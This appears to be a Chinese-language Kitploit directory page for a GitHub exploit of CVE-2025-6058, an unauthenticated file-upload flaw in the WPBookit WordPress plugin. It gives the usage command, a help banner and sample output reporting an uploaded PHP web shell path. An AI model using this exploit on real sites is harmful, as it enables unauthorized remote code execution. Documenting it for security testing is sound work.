Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-6058 — WPBookit <= 1.0.4 - 未认证任意文件上传 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-6058
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2025-6058

CVE-2025-6058

WPBookit <= 1.0.4 - 未认证任意文件上传

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

⚡ WPBookit <= 1.0.4 - 未认证任意文件上传


📝 描述

WordPress 的 WPBookit 插件在 image_upload_handle() 函数中由于缺少文件类型验证而存在任意文件上传漏洞,该函数通过 add_booking_type 路由挂载,影响所有版本(包括 1.0.4)。
此漏洞允许未认证的攻击者向受影响站点的服务器上传任意文件,可能导致远程代码执行。

CVECVSS 评分公开披露时间最后更新时间
CVE-2025-60589.8(严重)2025年7月11日2025年7月12日

🚀 这个漏洞利用脚本能做什么?

此漏洞利用程序自动执行以下操作:

  • 检测目标是否正在运行存在漏洞的 WPBookit 版本(<= 1.0.4)
  • 使用存在漏洞的路由,在无需认证的情况下上传 PHP shell
  • 确认 shell 上传成功,并提供其确切路径以进行远程命令执行

🛠️ 用法

root@kitploit:~
python3 CVE-2025-6058.py -u http://target.com/wordpress

🖥️ 示例

root@kitploit:~
python3 CVE-2025-6058.py -u http://target.com/wordpress

🆘 帮助与横幅示例

root@kitploit:~
python CVE-2025-6058.py -help

  ______   __     __  ________       ______    ______    ______   _______            ______    ______   _______    ______  
 /      \ /  |   /  |/        |     /      \  /      \  /      \ /       |          /      \  /      \ /       |  /      \ 
/$$$$$$  |$$ |   $$ |$$$$$$$$/     /$$$$$$  |/$$$$$$  |/$$$$$$  |$$$$$$$/          /$$$$$$  |/$$$$$$  |$$$$$$$/  /$$$$$$  |
$$ |  $$/ $$ |   $$ |$$ |__  ______$$____$$ |$$$  \$$ |$$____$$ |$$ |____   ______ $$ \__$$/ $$$  \$$ |$$ |____  $$ \__$$ |
$$ |      $$  \ /$$/ $$    |/      |/    $$/ $$$$  $$ | /    $$/ $$      \ /      |$$      \ $$$$  $$ |$$      \ $$    $$< 
$$ |   __  $$  /$$/  $$$$$/ $$$$$$//$$$$$$/  $$ $$ $$ |/$$$$$$/  $$$$$$$  |$$$$$$/ $$$$$$$  |$$ $$ $$ |$$$$$$$  | $$$$$$  |
$$ \__/  |  $$ $$/   $$ |_____     $$ |_____ $$ \$$$$ |$$ |_____ /  \__$$ |        $$ \__$$ |$$ \$$$$ |/  \__$$ |$$ \__$$ |
$$    $$/    $$$/    $$       |    $$       |$$   $$$/ $$       |$$    $$/         $$    $$/ $$   $$$/ $$    $$/ $$    $$/ 
 $$$$$$/      $/     $$$$$$$$/     $$$$$$$$/  $$$$$$/  $$$$$$$$/  $$$$$$/           $$$$$$/   $$$$$$/   $$$$$$/   $$$$$$/  
                                                                                                                           
                                                                                                                           
                                                                                                                           

Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited

usage: CVE-2025-6058.py [-h] -u URL

CVE-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL e.g http(s)://target.com/wordpress

📤 输出

root@kitploit:~
[*] Checking plugin version ...
[*] Exploiting file upload ...
[+] Exploitation successful!
[+] Shell path: wp-content/uploads/2025/07/shell.php?cmd=whoami
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited

⚠️ 免责声明

本工具仅供教育和授权的安全测试目的使用。
作者不对任何滥用或未经授权的活动负责。
请自行承担使用风险,并始终确保你已获得测试目标系统的许可。


作者:Khaled Alenazi (Nxploited)

下载工具